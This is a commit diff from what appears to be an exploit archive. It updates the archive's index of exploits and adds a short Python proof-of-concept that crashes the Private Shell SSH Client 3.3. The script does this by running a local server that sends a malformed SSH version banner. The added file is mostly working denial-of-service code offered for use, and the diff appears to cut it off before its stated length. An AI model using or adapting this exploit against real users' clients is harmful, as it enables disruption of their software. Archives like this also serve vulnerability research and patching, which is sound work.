DB: 2015-06-01

1 new exploits
2015-06-01 05:01:34 +00:00 · 2015-06-01 05:01:34 +00:00 · 75bd2aed32
commit 75bd2aed32
parent 0b3f393d50
2 changed files with 27 additions and 1 deletions
--- a/files.csv
+++ b/files.csv
@ -21241,7 +21241,7 @@ id,file,description,date,author,platform,type,port
 24041,platforms/multiple/remote/24041.c,"Epic Games Unreal Tournament Engine 3 UMOD Manifest.INI Remote Arbitrary File Overwrite Vulnerability",2004-04-22,"Luigi Auriemma",multiple,remote,0
 24042,platforms/windows/dos/24042.txt,"Yahoo! Messenger 5.6 YInsthelper.DLL Multiple Buffer Overflow Vulnerabilities",2004-04-23,"Rafel Ivgi The-Insider",windows,dos,0
 24043,platforms/linux/local/24043.c,"Linux Kernel 2.5.x/2.6.x - CPUFreq Proc Handler Integer Handling Vulnerability",2004-04-23,"Brad Spengler",linux,local,0
-24044,platforms/php/webapps/24044.txt,"phpliteadmin <= 1.9.3 - Remote PHP Code Injection Vulnerability",2013-01-11,L@usch,php,webapps,0
+24044,platforms/php/webapps/24044.txt,"phpLiteAdmin <= 1.9.3 - Remote PHP Code Injection Vulnerability",2013-01-11,L@usch,php,webapps,0
 24045,platforms/java/remote/24045.rb,"Java Applet JMX Remote Code Execution",2013-01-11,metasploit,java,remote,0
 24049,platforms/asp/webapps/24049.txt,"PW New Media Network Modular Site Management System 0.2.1 Ver.asp Information Disclosure Vulnerability",2004-04-23,CyberTalon,asp,webapps,0
 24050,platforms/php/webapps/24050.txt,"Advanced Guestbook 2.2 Password Parameter SQL Injection Vulnerability",2004-04-23,JQ,php,webapps,0
@ -33530,5 +33530,6 @@ id,file,description,date,author,platform,type,port
 37146,platforms/php/webapps/37146.txt,"PivotX 2.3.2 'ajaxhelper.php' Cross Site Scripting Vulnerability",2012-05-09,"High-Tech Bridge SA",php,webapps,0
 37147,platforms/php/webapps/37147.txt,"Chevereto 1.91 Upload/engine.php v Parameter XSS",2012-05-10,AkaStep,php,webapps,0
 37148,platforms/php/webapps/37148.txt,"Chevereto 1.91 Upload/engine.php v Parameter Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps,0
 37149,platforms/windows/dos/37149.py,"Private Shell SSH Client 3.3 - Crash PoC",2015-05-29,3unnym00n,windows,dos,22
 37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80
 37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80
--- a/platforms/windows/dos/37149.py
+++ b/platforms/windows/dos/37149.py
@ -0,0 +1,25 @@
 '''
 # Exploit title: privateshell SSH Client v.3.3 denial of service vulnerability
 # Date: 27-5-2015
 # Vendor homepage: www.privateshell.com
 # Software Link: http://www.privateshell.com/files/pshell.exe
 # Version: 3.3
 # Author: 3unnym00n
 # Details:
 # --------
 # when doing the ssh version exchange, if the server send a banner missing \r\n, can lead the pshell crash
 # Tested On: win7
 # operating steps: run the py, then execute : "D:\programfile\Private Shell\ssh.exe" root@127.0.0.1
 '''
 import socket
 soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 soc.bind(('127.0.0.1', 22))
 soc.listen(1)
 client, addr = soc.accept()
 client.send('SSH-2.0-SUCK') ## no "\r\n" lead to crash